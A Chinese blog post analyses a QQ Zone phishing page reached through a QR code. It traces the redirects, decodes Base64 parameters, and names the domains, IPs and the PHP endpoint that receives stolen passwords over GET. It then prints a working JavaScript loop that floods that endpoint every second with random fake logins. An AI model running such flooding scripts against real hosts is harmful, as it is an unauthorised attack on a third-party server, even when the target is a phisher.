差点被一个截图忽悠了，分析一个QQ空间钓鱼网站

刚刚打开手机tim看到QQ空间有留言下面一个截图的东西(别扫进去输自己的账号密码哈，看看就得了，典型的钓鱼网站)

貌似在前几年就有此类网站，不过现在高级了些，下面就由图图来分析一下原理是什么鬼(毫无技术含量)大神快点绕道！！！

首先看到这个图片而写是熟人给你留言的，并且还是以好友备注的名字进行留言“XXX，我们合影的照片都在这里了你太好笑了照片呆呆的，长摁识别”会有这么一句话，好奇心强的都会点进去看~

【为什么要搞这种二维码呢？就是为了不让一些在线解码的网站轻易识别反而只有QQ、微信可以轻松识别出来】

然后就给你来了一个这个界面，模仿QQ空间的登录界面，还高级了点，加了所谓的“安全”键盘

看着毫无破绽，呆呆地输进账号密码，此时此刻没管对错

输完之后看到的却是QQ个人轨迹，并不是所谓的合照，而此时此刻，你输进去的账号密码就通过这个傻逼写的PHP接口进行get提交到了他的服务器中，然后通过此账号密码登录QQ空间获取好友列表和备注，进行批量地发布留言（一传十，十传百....）

我也中招了，想着不太对劲赶紧到QQ安全中心修改密码

下面就了分析一下毫无技术含量的原理吧！

简单粗暴点，就不弄什么思维导图了

用户扫码打开网址---输入账号密码---提交账号密码到php---然后跳转到QQ官方的个人轨迹活动网址---完事

首先用户扫码识别识别内容https://w.url.cn/s/ApUGGIq 生成了腾讯短链

然后跳转到http://z3nfcjel.www.825480.cn/default.html#4201178?nsukey=aHR0cDovL3p4emNzLmNudnFBSFVBN0o=

这串get后缀的nsukey的值是Base64加密的

解密后得到：http://zxzcs.cnvqAHUA7J IP地址：120.240.95.40:8888

随后直接跳转到

https://sqd07y.coding-pages.com/agent.html?s=dCqSp4NasGicsZ%2FAWtsxTN8%2FjB39FdUm7duyDt36geIcW%2F4O7sEh5WA4mZFmVcr%2FrkhZtvSYfBjTZZrAjSV8l7f05yH28vl89Dyu6rVsojbm4BVNNKJGZ682Y5B9QWurBA6LTaJqMSLyTBDATDovkLHRJz5o7PqTHEuHaWJFwymMdHB%2BAhn8q9SIVEObQWs2IscPvCzygj3gYpEB0KOrPFyVE9d%2BzdpWZqf5Ely8lFMSyOEfguq42zQERaJVex2UZkR9e5fuDM7jRb9LrRXq%2B11y&nsukey=aHR0cHM6Ly9xZGhsY2dzLmNvbS9IVzBXOTVWVQ==

s的值不知道是用什么东西加密的

nsukey的值解码后得到：https://qdhlcgs.com/HW0W95VU

经过一波周折之后就进入了正式的界面

【https://qdhlcgs.com/】这个玩意

当时就是在这个页面输入了我的Q密，填完之后一激灵，完蛋，赶紧改密码先

在电脑浏览器上直接打开https://qdhlcgs.com/就会跳转到百度给你

审查下元素跳转宽度完美解决跳转问题，傻逼骗子判断不足啊

来随机填入账号密码然后提交

嗯~ 好东西，登录...

0000438438这个账号可能存在吗？

点击完登录按钮之后直接通过get请求将你的账号密码提交到了https://qdhlcgs.com/dnf.php中，收集完之后估计下一步就会登录QQ空间进行群发留言......

https://qdhlcgs.com/dnf.php?u=0000438438&p=idiot-shabi

不严谨的参值，是个php小白？咱也不知道，咱也不敢问啊..

整个站点的用到的js和css全部是用外部链接

qdhlcgs.com 主机IP：36.250.0.137 中国福建福州联通

请求接口：https://qdhlcgs.com/dnf.php

请求类型：GET

请求参值：u(账号) p(密码)

光拿到了接口怎么能行，搞个循环请求
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><title></title>
</head><body><div class="box"><iframe src="" frameborder="0" width="1280" height="300" id="kuanjia"></iframe></div>
</body>
<script src="http://libs.baidu.com/jquery/2.1.4/jquery.min.js"></script>
<script>
var data,dqnr;setInterval(function () {data=randomWord(false, 9);dqnr = "https://qdhlcgs.com/dnf.php?u="+data+"&p="+data;console.log(dqnr);$('iframe').attr('src', dqnr);}, 1000);function randomWord(randomFlag, min, max){var str = "",range = min,arr = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];if(randomFlag){range = Math.round(Math.random() * (max-min)) + min;}for(var i=0; i<range; i++){pos = Math.round(Math.random() * (arr.length-1));str += arr[pos];}return str;
}
</script></html>
用计时器每秒随机生成9位字符然后通过设置iframe框架的url一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环

在某爱那里有个老牛用Python写了死循环换IP请求，可以直接套用

（以后啊，看到这些东西就来分析一波....）

估计也就只有我这种小小学生才能上当了~~ 噗

才疏志大不自量西家东家笑我狂

卑微啊~

要是能搞到未解析的PHP代码，获取这骚玩意的邮件，搞他..

技术贴完结~

差点被一个截图忽悠了，分析一个QQ空间钓鱼网站相关推荐

写一个程序，用于分析一个字符串中各个单词出现的频率，并将单词和它出现的频率输出显示。（单词之间用空格隔开，如“Hello World My First Unit Test”）；...
功能实现类Test2: package com.kai.demo; import java.util.HashMap; import java.util.Iterator; import java.u ...
一个QQ空间的钓鱼盗号过程揭露，大家谨防上当
1.盗号过程很久没有用过QQ空间了,今天突然QQ弹出一条消息,说我的一个好友留言中提到了我,但是我却也打不开这个链接. 于是,我就去她的空间留言板查看.发现第一条留言,是一个二维码扫描之后,进入到 ...
基于SSH2做一个24小时订单分析表格
基于SSH2做一个24小时订单分析表格以下为要实现的最终效果截图: ps:没有时间优化前段页面样式,对前段美化有要求的小伙伴可以自行引用BOOtStrap.esayUi 或者 layUi 自行优化. ...
手写一个原神祈愿分析工具
手写一个原神祈愿分析工具之前一直通过游创工坊来进行祈愿抽卡数据分析,但是广告太多,而且担心auth_key泄露,于是自己花了一天时间动手实现了个数据分析工具,数据永久保存在本地,没有信息泄露风险,话 ...
汇编语言（第三版）王爽著（实验八）分析一个奇怪的程序
实验内容.程序清单及运行结果分析下面的程序,在运行前思考:这个程序可以正确返回吗? 运行后思考:为什么会是这种结果? 通过这个程序加深对相关内容的理解. assume cs:codesg codes ...
自己编写的一个截图工具
http://blog.csdn.net/crystal_lz/article/details/9200859 上面是以前写的不过现在重写了增加了一些功能源代码下载地址:http://downl ...
用系统架构中的系统思维分析一个咖啡厅系统
此文是对<系统架构>中第2章系统思维的笔记,前前后后看了很多遍,为了达到活学活用,尝试用系统思维分析一个生动的现实生活中的案例,这样有助于更深刻的理解及现实的建模能力.现分享给大家一起讨论 ...
分析一个文本（英文文章）（300k—500k）中的词出现的频率，并且把频率最高的10个词打印出来。...
最近老师出一个题目:分析一个文本(英文文章)(300k-500k)中的词出现的频率,并且把频率最高的10个词打印出来. 要分析每个词的频率,肯定要先把每个单词读出来并存储起来,用数据库存肯定是没那个必 ...
分析一个软件要考虑的问题
分析一个软件要考虑的问题 1.要分析它的所有功能,每一个细节都要注意到. 要知道它是干什么用的,它删除之后对其它地方有什么影响? 2.要找出它的设计缺陷所在.不合理的地方在哪里?并提出更好的改进措施. ...
C语言 03-第一个C程序代码分析
本文目录一.代码分析二.开发和运行C程序的步骤三.总结说明:这个C语言专题,是学习iOS开发的前奏.也为了让有面向对象语言开发经验的程序员,能够快速上手C语言.如果你还没有编程经验,或者对C语 ...

差点被一个截图忽悠了，分析一个QQ空间钓鱼网站

差点被一个截图忽悠了，分析一个QQ空间钓鱼网站相关推荐

最新文章

热门文章